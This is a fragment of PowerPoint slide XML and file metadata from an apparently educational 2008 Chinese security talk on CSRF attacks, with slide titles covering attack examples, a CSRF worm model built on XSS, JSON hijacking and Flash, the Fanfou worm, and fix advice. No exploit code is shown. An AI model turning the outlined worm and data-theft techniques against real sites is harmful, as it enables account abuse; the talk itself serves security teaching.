              <a:t>利用各种技术在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发起有效的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各种技术：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JavaScript, ActionScript, HTML/CSS, XML, ASP, PHP, JSP, .NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用户驱动下的请求：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主动的、被动的。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圆角矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214563" y="2868613"/>
            <a:ext cx="4643437" cy="1000125"/>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zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>攻击与基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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精武门模板V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精武门模板V1.5</Template>
  <TotalTime>933</TotalTime>
  <Words>1785</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>285</Paragraphs>
  <Slides>40</Slides>
  <Notes>40</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>40</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="52" baseType="lpstr">
      <vt:lpstr>精武门模板V1.5</vt:lpstr>
      <vt:lpstr>1_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>2_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>3_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>4_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>5_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>6_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>7_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>8_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>9_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>10_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>11_精武门模板V1.5</vt:lpstr>
      <vt:lpstr>CSRF攻击-苏醒的巨人</vt:lpstr>
      <vt:lpstr>CSRF是什么</vt:lpstr>
      <vt:lpstr>内容</vt:lpstr>
      <vt:lpstr>幻灯片 4</vt:lpstr>
      <vt:lpstr>CSRF模型</vt:lpstr>
      <vt:lpstr>恶意站点</vt:lpstr>
      <vt:lpstr>浏览器</vt:lpstr>
      <vt:lpstr>可信任的请求</vt:lpstr>
      <vt:lpstr>幻灯片 9</vt:lpstr>
      <vt:lpstr>CSRF攻击</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例1</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例1</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例1</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例1</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例1</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例2</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例2</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例2</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例2</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例3</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例3</vt:lpstr>
      <vt:lpstr>CSRF攻击-实例3</vt:lpstr>
      <vt:lpstr>基于CSRF的攻击</vt:lpstr>
      <vt:lpstr>基于CSRF的攻击-实例</vt:lpstr>
      <vt:lpstr>基于CSRF的攻击-实例</vt:lpstr>
      <vt:lpstr>基于CSRF的攻击-实例</vt:lpstr>
      <vt:lpstr>幻灯片 27</vt:lpstr>
      <vt:lpstr>CSRF蠕虫模型</vt:lpstr>
      <vt:lpstr>1、数据获取模块</vt:lpstr>
      <vt:lpstr>使用XSS</vt:lpstr>
      <vt:lpstr>使用服务端代理</vt:lpstr>
      <vt:lpstr>使用JSON Hijacking</vt:lpstr>
      <vt:lpstr>使用Flash</vt:lpstr>
      <vt:lpstr>其它方法</vt:lpstr>
      <vt:lpstr>2、数据发送模块</vt:lpstr>
      <vt:lpstr>CSRF蠕虫模型</vt:lpstr>
      <vt:lpstr>饭否CSRF蠕虫</vt:lpstr>
      <vt:lpstr>幻灯片 38</vt:lpstr>
      <vt:lpstr>修补建议</vt:lpstr>
      <vt:lpstr>幻灯片 40</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>alipay 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User</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-12-05T02:58:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-12-15T18:03:49Z</dcterms:modified>
</cp:coreProperties>
</file>